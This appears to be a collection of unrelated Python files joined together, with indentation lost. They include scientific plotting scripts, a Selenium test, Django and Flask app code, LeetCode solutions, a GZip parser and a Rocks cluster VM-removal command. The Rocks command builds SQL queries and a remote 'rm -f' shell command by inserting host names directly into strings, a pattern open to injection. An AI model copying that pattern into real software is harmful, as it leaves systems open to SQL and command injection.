sys.stdout.write(' sigmaMyersProtein = '+str(math.sqrt(cov22_MyersProtein/num_common_AA_MyersProtein))+'\n')
sys.stdout.write(' R = '+str(math.sqrt((cov12_MyersProtein*cov12_MyersProtein)/(cov11_MyersProtein*cov22_MyersProtein)))+'\n')
sys.stdout.write('-------------------------------------\n')
sys.stdout.write(' sigma = '+str(math.sqrt(cov11_MyersPeptide/num_common_AA_MyersPeptide))+'\n')
sys.stdout.write(' sigmaMyersPeptide = '+str(math.sqrt(cov22_MyersPeptide/num_common_AA_MyersPeptide))+'\n')
sys.stdout.write(' R = '+str(math.sqrt((cov12_MyersPeptide*cov12_MyersPeptide)/(cov11_MyersPeptide*cov22_MyersPeptide)))+'\n')
sys.stdout.write('-------------------------------------\n')
# If an argument to this program was given, then we assume it is
# the name of a file containing a candidate sequence.
# Assuming that the energy of every amino acid is additive,
# we can estimate the energy of the candidate sequence.
# Ignoring correlations, this is proportional to the the negative logarithm
# of the probability of a sequence of that length evolving at random.
if len(sys.argv) > 1:
seqfilename = sys.argv[1]
file = open(seqfilename,'r')
for line in file:
line = line.strip()
sys.stdout.write('Using energies inferred from the database:\n')
U, deltaU = CalcSequenceEnergyErr(line,ener,delta_ener)
sys.stdout.write(str(U*kB*T)+' '+str(deltaU*kB*T)+'\n')
sys.stdout.write('Using Horovitz1992:\n')
U = CalcSequenceEnergy(line,helixPropensityHorovitz)
sys.stdout.write(str(U)+'\n')
sys.stdout.write('Using ONeil1990:\n')
U = CalcSequenceEnergy(line,helixPropensityONeil)
sys.stdout.write(str(U)+'\n')
sys.stdout.write('Using Blaber44_1993:\n')
U = CalcSequenceEnergy(line,helixPropensityBlaber44)
sys.stdout.write(str(U)+'\n')
sys.stdout.write('Using Myers1997_peptide_pH7:\n')
U = CalcSequenceEnergy(line,helixPropensityMyersPeptidePh7)
sys.stdout.write(str(U)+'\n')
sys.stdout.write('Using Myers1997_protein_pH7:\n')
U = CalcSequenceEnergy(line,helixPropensityMyersProteinPh7)
sys.stdout.write(str(U)+'\n')
if __name__ == "__main__":
main()
|
import re, numpy, os,operator,time,math
import matplotlib.pyplot as plt
from multiprocessing import Pool
from mpl_toolkits.mplot3d import Axes3D
def takeSecond(elem):
return (-elem.X,-elem.Y)
class Pop(object):
def __init__(self,X=[],Y=[],Z=[],Pressure=[],v=[],u=[],w=[] ) :
self.X=X
self.Y=Y
self.Z=Z
self.Pressure=Pressure
self.v=v
self.u=u
self.w=w
t2=time.time()
#file = open('../postProcessing/forces%i/0/forces.dat'%I, 'r')
file = open('export.csv', 'r')
file = file.read()
s=map(float, re.findall(r'[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?', file))
X=numpy.array(s)
a=[]
z=0
for i in s:
if z>=13:
a.append(i)
z+=1
i=0
P=[]
P.append(Pop(a[i],a[i+1],a[i+2],a[i+3],a[i+7],a[i+8],a[i+9]))
#print [a[i],a[i+1],a[i+2],a[i+3],a[i+7],a[i+8],a[i+9]]
while i<=((len(a)-13)):
#print i
#print a[i]
P.append(Pop(a[i],a[i+1],a[i+2],a[i+3],a[i+7],a[i+8],a[i+9]))
#X.append(a[i]);i+=1
#Y.append(a[i]);i+=1
#Z.append(a[i]);i+=1
#Pressure.append(a[i]);i+=4
#u.append(a[i]);i+=1
#v.append(a[i]);i+=1
#w.append(a[i]);i+=1
i+=16
p1=P
#P.sort(key=lambda x:takeSecond)#takeSecond)
P.sort(key=takeSecond)
print 'Sorted'
for i in xrange(0,10):
print i,[P[i].X,P[i].Y,P[i].Z,P[i].Pressure,P[i].v,P[i].u,P[i].w]
p2=[]
for i in range(len(P)):
if P[i].Y>=1.440:
p2.append(P[i])
for i in xrange(0,10):
print i,[p2[i].X,p2[i].Y,p2[i].Z,p2[i].Pressure,p2[i].v,p2[i].u,p2[i].w]
mesh=[]
z=1
for i in range(len(p2)-1):
if p2[i+1].X==p2[i].X:
z+=1
else:
mesh.append(z)
z=1
z=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
#print z,len(z),len(z[0])
X=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
Y=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
#Z=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
Pressure=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
v=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
u=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
#w=z
t=0
for i in range(len(z)):
for j in range(len(z[i])):
X[i][j]=p2[t].X
Y[i][j]=p2[t].Y
#Z[i][j]=p2[t].Z
Pressure[i][j]=p2[t].Pressure
v[i][j]=-p2[t].v
u[i][j]=p2[t].u
#w[i][j]=p2[t].w
t+=1
#X1=numpy.asarray(X)
#Y1=numpy.asarray(Y)
#Pressure1=numpy.asarray(Pressure)
'''
for i in xrange(0,200):
print i,[p2[i].X,p2[i].Y,p2[i].Z,p2[i].Pressure,p2[i].v,p2[i].u,p2[i].w]
'''
print len(X),len(X[0]),len(Y),len(Y[0]),len(Pressure),len(Pressure[0])
'''
for i in xrange(0,150):
plt.plot(Y[i],v[i])
print i,X[i][0]
#plt.show()
'''
#'''
min1=min([min([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
max1=max([max([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
def run(t):
Y1=[[0 for i in range(len(Y[t]))]for j in range(len(Y[t]))]
Z1=[[0 for i in range(len(Y[t]))]for j in range(len(Y[t]))]
Pressure1=[[0 for i in range(len(Y[t]))]for j in range(len(Y[t]))]
for i in range(len(Y1)):
for j in range(len(Y1[i])):
Y1[i][j]=Y[t][j]
Z1[i][j]=i/10#((len(Y1[i])-j)**2/(len(Y1[i])))*14.0
Pressure1[i][j]=((len(Y1[i])-i)/(len(Y1[i])))*Pressure[t][j]#
#print Pressure1
print len(Y1),len(Y1[0]),min1,max1
plt.contourf(Y1,Z1,Pressure1,255,vmin=int(min1),vmax=int(max1))
plt.axis('equal')
plt.savefig('PICS/Fig%i.png'%(t))
plt.close()
ax=[t for t in range(len(X))]
#ax=[100,150]
y = Pool()
result = y.map(run,ax)
y.close()
y.join()
#min1=min([min([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
#max1=max([max([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
#print min1,max1
plt.contourf(X,Y,Pressure,255,vmin=int(min1),vmax=int(max1))
plt.axis('equal')
plt.savefig('Pressure.jpg')
plt.show()
plt.close()
'''
#'''
#plt.show()
'''
fig=plt.figure()
ax=fig.add_subplot(111,projection='3d')
plt.scatter(X,Y,Pressure,alpha=0.8,c='b',edgecolor='none')
plt.show()
x,y=numpy.meshgrid(X,Y)
z=numpy.meshgrid(Pressure)
print x,y,z
delta=0.1
x=numpy.arange(-3.0,3.0,delta)
y=numpy.arange(-2.0,2.0,delta)
X,Y=numpy.meshgrid(x,y)
Z1=numpy.exp(-X**2-Y**2)
Z2=numpy.exp(-(X-1)**2-(Y-1)**2)
Z=(Z1-Z2)*2
print X,Y,Z
plt.contour(X,Y,Z)
plt.show()
''' |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from selenium_auto.test_windows_and_frame_locate.Base import Base
class TestWindows(Base):
def test_window(self):
self.driver.get("http://www.baidu.com")
self.driver.find_element_by_link_text("登录").click()
print(self.driver.current_window_handle) # 跳转前打印当前窗口
print(self.driver.window_handles) # 打印所有窗口
self.driver.find_element_by_link_text("立即注册").click()
print(self.driver.current_window_handle) # 跳转后打印当前窗口
print(self.driver.window_handles) # 打印所有窗口
windows = self.driver.window_handles
self.driver.switch_to_window(windows[-1])
print(self.driver.current_window_handle) # 使用switch_to_window转换当前的窗口为跳转后的窗口再打印当前窗口
self.driver.find_element_by_id("TANGRAM__PSP_4__userName").send_keys("username")
self.driver.find_element_by_id("TANGRAM__PSP_4__phone").send_keys("13570808795")
time.sleep(2)
self.driver.switch_to_window(windows[0])
time.sleep(2)
self.driver.find_element_by_id("TANGRAM__PSP_10__footerULoginBtn").click()
|
import numpy as np
import math
import matplotlib as mpl
import matplotlib.pyplot as plt
"""
mpl.rcParams['font.sans-serif'] = [u'SimHei']
mpl.rcParams['axes.unicode_minus'] = False
mu = 0
sigma = 1
x = np.linspace(mu - 3*sigma, mu + 3*sigma, 51)
y = np.exp(-(x - mu) ** 2 / (2 * sigma **2)) / (math.sqrt(2 * math.pi) * sigma)
plt.figure(facecolor='w')
plt.plot(x, y, 'r-', x, y, 'go', linewidth = 2, markersize = 8)
plt.xlabel('X', fontsize = 15)
plt.ylabel('Y', fontsize = 15)
plt.title('Gauss Distribution', fontsize = 18)
plt.grid(True)
plt.show()
#损失函数
x = np.linspace(start = -2,stop = 3, num = 1001, dtype = np.float)
y_logit = np.log(1 + np.exp(-x)) / math.log(2)
y_boost = np.exp(-x)
y_01 = x < 0
y_hinge = 1.0 - x
y_hinge[y_hinge < 0] = 0
plt.figure(figsize = (10, 8))
plt.plot(x, y_logit, 'r-', label = 'Logistic Loss', linewidth = 2)
plt.plot(x, y_01, 'g-',label = '0/1 Loss', linewidth = 2)
plt.plot(x, y_hinge, 'b-', label = 'Hinge Loss', linewidth = 2)
plt.plot(x, y_boost, 'm--', label = 'Adaboost Loss', linewidth = 2)
plt.grid()
plt.legend(loc = 'upper right')
plt.show()
def f(x):
y = np.ones_like(x) #形状一样,用1填充
i = x > 0
y[i] = np.power(x[i], x[i])
i = x < 0
y[i] = np.power(-x[i], -x[i])
return y
#x^x函数
x = np.linspace(-1.3, 1.3, 101)
y = f(x)
plt.plot(x, y, 'g-', label = 'x^x', linewidth = 2)
plt.grid()
plt.legend(loc = 'upper left')
plt.show()
"""
#sinx 函数
x = np.linspace(0, 10, 100)
y = np.sin(x)
plt.plot(x, y, 'g-', label = 'sinx', linewidth = 2)
plt.grid()
plt.legend(loc = 'upper right')
plt.show() |
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from .models import Profile, Neighborhood, Business ,Post
class ProfileForm(forms.ModelForm):
'''
Class to create a form for an authenticated user to update profile
'''
class Meta:
model = Profile
fields = ['profile_photo','name']
class NeighborhoodForm(forms.ModelForm):
'''
Class to create a form for an authenticated user to create neighborhood
'''
class Meta:
model = Neighborhood
fields = ['neighborhood_name','neighborhood_location', 'population']
class PostBusinessForm(forms.ModelForm):
'''
Class to create a form for an authenticated user to post a business
'''
class Meta:
model = Business
fields = ['cover_image','business_name', 'email']
class PostMessageForm(forms.ModelForm):
'''
Class to create a form for an authenticated user to post a message
'''
class Meta:
model = Post
fields = ['image','image_name', 'message'] |
class Solution:
def maxProfit(self, prices: List[int]) -> int:
profits, lowest, highest, maxProfit = [], float('inf'), -float('inf'), 0
for p in prices:
if p < lowest:
lowest = p
maxProfit = max(maxProfit, p-lowest)
profits.append(maxProfit)
maxProfit = 0
for i in range(len(profits)-1, -1, -1):
if prices[i] > highest:
highest = prices[i]
maxProfit = max(maxProfit, (highest - prices[i]) + (profits[i-1] if i > 0 else 0))
return maxProfit
class Solution:
def maxProfit(self, prices: List[int]) -> int:
sell1, sell2, buy1, buy2 = 0, 0, -999999, -999999
for price in prices:
buy1 = max(buy1, -price)
sell1 = max(sell1, buy1 + price)
buy2 = max(buy2, sell1 - price)
sell2 = max(sell2, buy2 + price)
return sell2 |
import math
def main():
n, w, h = [int(s) for s in raw_input().split()]
d = math.sqrt(w**2 + h**2)
for _ in range(n):
l = input()
print 'NE' if l > d else 'DA'
if '__main__' == __name__:
main()
|
import test_path_setting
import torch
from models import lrcn
def lrcn_test(num_classes, parameter):
model = lrcn(num_classes, 60)
print(model)
if parameter:
for name, param in model.named_parameters():
print(name, end="")
print(":", param.numel())
total_params = sum(param.numel() for param in model.parameters())
print("total_params:", total_params)
# inputs = torch.randn(5, 60, 3, 128, 128)
inputs = torch.randn(5, 10)
print(inputs.size())
outputs = model(inputs)
print(outputs.size())
if __name__ == "__main__":
try:
num_classes = int(input("num_classes: "))
except ValueError:
num_classes = 140
try:
parameter = bool(input("parameter: "))
except ValueError:
parameter = False
try:
expansion = bool(input("expansion: "))
except ValueError:
expansion = False
lrcn_test(num_classes, parameter)
|
# -*- coding: utf-8 -*-
"""GZip files."""
# Note: do not rename file to gzip.py this can cause the exception:
# AttributeError: 'module' object has no attribute 'GzipFile'
# when using pip.
import os
import zlib
from dtformats import data_format
from dtformats import errors
class GZipFile(data_format.BinaryDataFile):
"""GZip (.gz) file."""
# Using a class constant significantly speeds up the time required to load
# the dtFabric and dtFormats definition files.
_FABRIC = data_format.BinaryDataFile.ReadDefinitionFile('gzipfile.yaml')
_DEBUG_INFORMATION = data_format.BinaryDataFile.ReadDebugInformationFile(
'gzipfile.debug.yaml', custom_format_callbacks={
'posix_time': '_FormatIntegerAsPosixTime'})
_GZIP_SIGNATURE = 0x8b1f
_COMPRESSION_METHOD_DEFLATE = 8
_FLAG_FTEXT = 0x01
_FLAG_FHCRC = 0x02
_FLAG_FEXTRA = 0x04
_FLAG_FNAME = 0x08
_FLAG_FCOMMENT = 0x10
_BUFFER_SIZE = 16 * 1024 * 1024
def _ReadCompressedData(self, zlib_decompressor, compressed_data):
"""Reads compressed data.
Args:
zlib_decompressor (zlib.Decompress): zlib decompressor.
compressed_data (bytes): compressed data.
Returns:
tuple[bytes, bytes]: decompressed data and remaining data.
"""
data_segments = []
while compressed_data:
data = zlib_decompressor.decompress(compressed_data)
if not data:
break
data_segments.append(data)
compressed_data = getattr(zlib_decompressor, 'unused_data', b'')
return b''.join(data_segments), compressed_data
def _ReadMemberCompressedData(self, file_object):
"""Reads a member compressed data.
Args:
file_object (file): file-like object.
"""
zlib_decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
compressed_data = file_object.read(self._BUFFER_SIZE)
while compressed_data:
data, compressed_data = self._ReadCompressedData(
zlib_decompressor, compressed_data)
if compressed_data:
file_object.seek(-len(compressed_data), os.SEEK_CUR)
if not data:
break
compressed_data = file_object.read(self._BUFFER_SIZE)
def _ReadMemberFooter(self, file_object):
"""Reads a member footer.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the member footer cannot be read.
"""
file_offset = file_object.tell()
data_type_map = self._GetDataTypeMap('gzip_member_footer')
member_footer, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'member footer')
if self._debug:
debug_info = self._DEBUG_INFORMATION.get('gzip_member_footer', None)
self._DebugPrintStructureObject(member_footer, debug_info)
def _ReadMemberHeader(self, file_object):
"""Reads a member header.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the member header cannot be read.
"""
file_offset = file_object.tell()
data_type_map = self._GetDataTypeMap('gzip_member_header')
member_header, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'member header')
if self._debug:
debug_info = self._DEBUG_INFORMATION.get('gzip_member_header', None)
self._DebugPrintStructureObject(member_header, debug_info)
if member_header.signature != self._GZIP_SIGNATURE:
raise errors.ParseError(
f'Unsupported signature: 0x{member_header.signature:04x}.')
if member_header.compression_method != self._COMPRESSION_METHOD_DEFLATE:
raise errors.ParseError((
f'Unsupported compression method: '
f'{member_header.compression_method:d}.'))
if member_header.flags & self._FLAG_FEXTRA:
file_offset = file_object.tell()
data_type_map = self._GetDataTypeMap('uint16le')
extra_field_data_size, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'extra field data size')
file_object.seek(extra_field_data_size, os.SEEK_CUR)
if member_header.flags & self._FLAG_FNAME:
file_offset = file_object.tell()
data_type_map = self._GetDataTypeMap('cstring')
value_string, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'original filename')
if self._debug:
self._DebugPrintValue('Original filename', value_string)
if member_header.flags & self._FLAG_FCOMMENT:
file_offset = file_object.tell()
data_type_map = self._GetDataTypeMap('cstring')
value_string, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'comment')
if self._debug:
self._DebugPrintValue('Comment', value_string)
if member_header.flags & self._FLAG_FHCRC:
file_object.read(2)
def ReadFileObject(self, file_object):
"""Reads a GZip file-like object.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the file cannot be read.
"""
file_offset = 0
while file_offset < self._file_size:
self._ReadMemberHeader(file_object)
self._ReadMemberCompressedData(file_object)
self._ReadMemberFooter(file_object)
file_offset = file_object.tell()
|
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.home),
path('notify/', views.notify),
path('login/', views.login),
path('<int:id>/', views.post),
path('create/', views.create)
] |
from django.conf.urls import patterns, include, url
from rest_framework import routers
from .views import (
EquipoViewSet, ComentarioViewSet
)
router = routers.DefaultRouter()
router.register(r'equipos', EquipoViewSet)
router.register(r'comentarios', ComentarioViewSet)
urlpatterns = patterns('uthhconf.api.views',
url(r'^', include(router.urls)),
)
|
from django.http import HttpResponse
from django.shortcuts import render # this is used for getting attached html file
import operator
def Homepage(request):
return render(request,'home.html')# this is return html page and we can also pass python code here which is written on html file or as variable
def aboutpage(request):
return render(request,'about.html')
def birds(request):
return HttpResponse('This is the bird page')
#def animals(request):
return HttpResponse('This is the Specfic animal page')
def countfunction (request):
fulltext=request.GET['fulltext']# BY THIS WE ARE GETTING THE WORDS WRITTEN IN TEXT BOX
wordlist = fulltext.split()
worddictionary = {}
for word in wordlist:
if word in worddictionary:
#increase
worddictionary[word] +=1
else:
#add to the dictiionary
worddictionary[word] =1
sortedwords = sorted(worddictionary.items(), key= operator.itemgetter(1), reverse= True)
return render(request,'count.html',{'fulltext':fulltext,'count':len(wordlist),'sortedwords':sortedwords})
|
"""
Unit test to make sure the test_grades function calculates score changes properly.
Author: kk3175
Date: 12/8/2015
Class: DSGA1007, Assignment 10
"""
import pandas as pd
from RestaurantInspectionData import RestaurantInspectionData
from unittest import TestCase
from datetime import datetime
class GradeScoresTest(TestCase):
def test__test_grades_function(self):
restaurantData = RestaurantInspectionData()
date1 = datetime.strptime('2012-02-22 00:00:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime('2015-06-22 00:00:00', '%Y-%m-%d %H:%M:%S')
dates_testList = [date1, date2]
# test for the case when the grade does not change
grade_testList = ['C', 'C']
output = restaurantData.test_grades(grade_testList, dates_testList)
expectedOutput = 0
self.assertEqual(output, expectedOutput)
# test for the case when the grade improves
grade_testList = ['C', 'A']
output = restaurantData.test_grades(grade_testList, dates_testList)
expectedOutput = 1
self.assertEqual(output, expectedOutput)
# test for the case when the grade declines
grade_testList = ['A', 'C']
output = restaurantData.test_grades(grade_testList, dates_testList)
expectedOutput = -1
self.assertEqual(output, expectedOutput)
|
# $Id: __init__.py,v 1.14 2012/11/27 00:49:40 phil Exp $
#
# @Copyright@
#
# Rocks(r)
# www.rocksclusters.org
# version 5.6 (Emerald Boa)
# version 6.1 (Emerald Boa)
#
# Copyright (c) 2000 - 2013 The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice unmodified and in its entirety, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. All advertising and press materials, printed or electronic, mentioning
# features or use of this software must display the following acknowledgement:
#
# "This product includes software developed by the Rocks(r)
# Cluster Group at the San Diego Supercomputer Center at the
# University of California, San Diego and its contributors."
#
# 4. Except as permitted for the purposes of acknowledgment in paragraph 3,
# neither the name or logo of this software nor the names of its
# authors may be used to endorse or promote products derived from this
# software without specific prior written permission. The name of the
# software includes the following terms, and any derivatives thereof:
# "Rocks", "Rocks Clusters", and "Avalanche Installer". For licensing of
# the associated name, interested parties should contact Technology
# Transfer & Intellectual Property Services, University of California,
# San Diego, 9500 Gilman Drive, Mail Code 0910, La Jolla, CA 92093-0910,
# Ph: (858) 534-5815, FAX: (858) 534-7345, E-MAIL:invent@ucsd.edu
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# @Copyright@
#
# $Log: __init__.py,v $
# Revision 1.14 2012/11/27 00:49:40 phil
# Copyright Storm for Emerald Boa
#
# Revision 1.13 2012/05/06 05:49:50 phil
# Copyright Storm for Mamba
#
# Revision 1.12 2011/07/23 02:31:44 phil
# Viper Copyright
#
# Revision 1.11 2010/09/07 23:53:33 bruno
# star power for gb
#
# Revision 1.10 2009/05/01 19:07:34 mjk
# chimi con queso
#
# Revision 1.9 2008/10/18 00:56:23 mjk
# copyright 5.1
#
# Revision 1.8 2008/09/02 18:19:29 phil
# Plugin to also remove any host-specific bootprofiles when removing vm host
#
# Revision 1.7 2008/09/02 18:03:16 phil
# support plugin to remove host-specific bootprofile when removing vm host
#
# Revision 1.6 2008/04/21 16:37:35 bruno
# nuked the vm_macs table -- now using the networks table to store/retrieve
# mac addresses for VMs
#
# Revision 1.5 2008/04/17 16:38:21 bruno
# incorporate phil's vm changes
#
# Revision 1.4 2008/03/06 23:42:04 mjk
# copyright storm on
#
# Revision 1.3 2008/02/01 21:38:54 bruno
# closer
#
# Revision 1.2 2008/02/01 21:27:53 bruno
# plugin for removing VM configuration info from the database
#
# Revision 1.1 2007/12/03 19:48:51 bruno
# xen for V
#
#
import os
import rocks.commands
class Command(rocks.commands.remove.host.command):
"""
Remove the configuration info in the database for the supplied hosts.
<arg type='string' name='host' repeat='1'>
A list of one or more VM host names.
</arg>
<example cmd='remove host vm compute-0-0-0'>
Remove the configuration info in the database for compute-0-0-0.
</example>
"""
def run(self, params, args):
if not len(args):
self.abort('must supply at least one host')
for host in self.getHostnames(args):
self.runPlugins(host)
vmnodeid = None
mem = None
cpus = None
macs = None
disks = None
#
# get the node id of the VM
#
rows = self.db.execute("""select vn.id from
nodes n, vm_nodes vn where vn.node = n.id
and n.name = '%s' """ % host)
if rows != 1:
continue
vmnodeid, = self.db.fetchone()
if not vmnodeid:
continue
#
# get the name of the physical node that hosts
# this VM
#
rows = self.db.execute("""select vn.physnode from
vm_nodes vn, nodes n where n.name = '%s'
and n.id = vn.node""" % (host))
if rows == 1:
physnodeid, = self.db.fetchone()
else:
continue
rows = self.db.execute("""select name from nodes where
id = %s""" % (physnodeid))
if rows == 1:
physhost, = self.db.fetchone()
else:
continue
#
# remove the configuration file on the physical node
#
os.system('ssh -q %s "rm -f /etc/xen/rocks/%s"' %
(physhost, host))
#
# now remove the relevant rows in the database for
# this VM
#
self.db.execute("""delete from vm_nodes where
id = %s""" % (vmnodeid))
self.db.execute("""delete from vm_disks where
vm_node = %s""" % (vmnodeid))
|
import random
minNumber = 1
maxNumber = 6
rollAgain = "yes"
while rollAgain == "yes" or rollAgain == "y":
print("Rolling the dice...")
print("The values are {} and {}".format(random.randint(minNumber, maxNumber), random.randint(minNumber, maxNumber)))
rollAgain = input("Roll the dice again?")
else:
print("Game Over")
|
'''
15. 3Sum
Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.
Notice that the solution set must not contain duplicate triplets.
Example 1:
Input: nums = [-1,0,1,2,-1,-4]
Output: [[-1,-1,2],[-1,0,1]]
Example 2:
Input: nums = []
Output: []
Example 3:
Input: nums = [0]
Output: []
Constraints:
0 <= nums.length <= 3000
-105 <= nums[i] <= 105
'''
from typing import List
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
result = []
# First sort the array
nums.sort()
for i in range(len(nums)):
if nums[i] > 0:
# If the lowest val of a, b, c is greater than 0, break
break
# Skip duplicates
if i == 0 or nums[i - 1] != nums[i]:
# Run two sum on nums[i+1:]
self.twoSum(nums, i, result)
return result
def twoSum(self, nums: List[int], i: int, result: List[List[int]]) -> None:
lo, hi = i + 1, len(nums) - 1
while lo < hi:
sum = nums[i] + nums[lo] + nums[hi]
if sum == 0:
result.append([nums[i], nums[lo], nums[hi]])
lo += 1
hi -= 1
# Skip duplicates
while lo < hi and nums[lo - 1] == nums[lo]:
lo += 1
elif sum > 0:
hi -= 1
else:
lo += 1
|
from flask import jsonify
from psycopg2 import IntegrityError
from datetime import datetime
from app.DAOs.EventDAO import EventDAO
from app.handlers.RoomHandler import RoomHandler
from app.handlers.TagHandler import TagHandler
from app.handlers.UserHandler import UserHandler
from app.handlers.WebsiteHandler import WebsiteHandler
import app.handlers.SharedValidationFunctions as SVF
CREATEEVENTKEYS = ['roomid', 'etitle', 'edescription', 'estart', 'eend', 'photourl', 'tags', 'websites']
ESTATUS_TYPES = ['active', 'deleted']
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
ITYPES = ["following", "unfollowed", "dismissed"]
RECOMMENDATION_TYPES = ["R", "N"]
SEARCHSTRING = 'searchstring'
TIMESTAMP = 'timestamp'
def _buildCoreEventResponse(event_tuple):
"""
Private Method to build core event dictionary to be JSONified.
Uses :func:`~app.handlers.RoomHandler.RoomHandler.safeGetRoomByID`
:param event_tuple: response tuple from SQL query
:returns Dict: Event information with keys:
.. code-block:: python
{'eid', 'ecreator', 'room', 'etitle', 'edescription',
'estart', 'eend', 'ecreation',
'estatus', 'estatusdate', 'photourl'}
"""
response = {}
response['eid'] = event_tuple[0]
response['ecreator'] = event_tuple[1]
response['room'] = RoomHandler().safeGetRoomByID(rid=event_tuple[2])
response['etitle'] = event_tuple[3]
response['edescription'] = event_tuple[4]
response['estart'] = str(event_tuple[5])
response['eend'] = str(event_tuple[6])
response['ecreation'] = str(event_tuple[7])
response['estatus'] = event_tuple[8]
response['estatusdate'] = str(event_tuple[9])
response['photourl'] = event_tuple[10]
return response
def _buildEventResponse(event_tuple):
"""
Private Method to build event dictionary to be JSONified.
Uses:
* :func:`~app.handlers.UserHandler.UserHandler.getUserByID`
* :func:`~app.handlers.RoomHandler.RoomHandler.safeGetRoomByID`
* :func:`~app.handlers.TagHandler.TagHandler.safeGetTagsByEventID`
* :func:`~app.handlers.WebsiteHandler.WebsiteHandler.getWebistesByEventID`
:param event_tuple: response tuple from SQL query
:returns Dict: Event information with keys:
.. code-block:: python
{'eid', 'ecreator', 'room', 'etitle', 'edescription',
'estart', 'eend', 'ecreation',
'estatus', 'estatusdate', 'photourl',
'tags', 'websites'}
"""
response = {}
response['eid'] = event_tuple[0]
# This SHOULD not break, since every event SHOULD have a user.
response['ecreator'] = UserHandler().getUserByID(uid=event_tuple[1], no_json=True)
response['room'] = RoomHandler().safeGetRoomByID(rid=event_tuple[2])
response['etitle'] = event_tuple[3]
response['edescription'] = event_tuple[4]
response['estart'] = str(event_tuple[5])
response['eend'] = str(event_tuple[6])
response['ecreation'] = str(event_tuple[7])
response['estatus'] = event_tuple[8]
response['estatusdate'] = str(event_tuple[9])
response['photourl'] = event_tuple[10]
response['tags'] = TagHandler().safeGetTagsByEventID(eid=event_tuple[0])
response['websites'] = WebsiteHandler().getWebistesByEventID(eid=event_tuple[0], no_json=True)
return response
def _buildTinyEventResponse(event_tuple):
"""
Private Method to build tiny event dictionary to be JSONified.
:param event_tuple: response tuple from SQL query
:returns Dict: Event information with keys:
.. code-block:: python
{'eid', 'estart', 'eend', 'ecreation',
'estatus', 'estatusdate'}
"""
response = {}
response['eid'] = event_tuple[0]
response['estart'] = str(event_tuple[5])
response['eend'] = str(event_tuple[6])
response['ecreation'] = str(event_tuple[7])
response['estatus'] = event_tuple[8]
response['estatusdate'] = str(event_tuple[9])
return response
def _validateEventParameters(json, uid):
"""
Private method to validate the parameters passed via JSON to create an event.
Uses :func:`~app.handlers.EventHandler._validateTimestamp`
:param json: JSON used to create event.
:param uid: User ID of person trying to create the event.
:raises: ValueError
"""
if not isinstance(uid, int) or uid <= 0:
raise ValueError("ecreator uid value not valid: " + str(uid))
if not isinstance(json['roomid'], int) or json['roomid'] <= 0:
raise ValueError("roomid value not valid: " + str(json['roomid']))
if not isinstance(json['etitle'], str) or json['etitle'].isspace() or json['etitle'] == '':
raise ValueError("etitle value not valid: " + str(json['etitle']))
if not isinstance(json['edescription'], str) or json['edescription'].isspace() or json['edescription'] == '':
raise ValueError("edescription value not valid: " + str(json['edescription']))
if not isinstance(json['estart'], str) or not _validateTimestamp(datestring=json['estart']):
raise ValueError("estart value not valid: " + str(json['estart']))
if not isinstance(json['eend'], str) or not _validateTimestamp(datestring=json['eend']):
raise ValueError("eend value not valid: " + str(json['eend']))
if not _validateStartEndDates(start=json['estart'], end=json['eend']):
raise ValueError(
"eend [{end}] must be greater than estart [{start}]".format(end=json['eend'], start=json['estart']))
if json['photourl'] is not None:
if not isinstance(json['photourl'], str) or json['photourl'].isspace() or json['photourl'] == '':
raise ValueError("photourl value not valid: " + str(json['photourl']))
if not isinstance(json['tags'], list):
raise ValueError("Array of tags provided improperly: " + str(json['tags']))
if json['websites'] is not None:
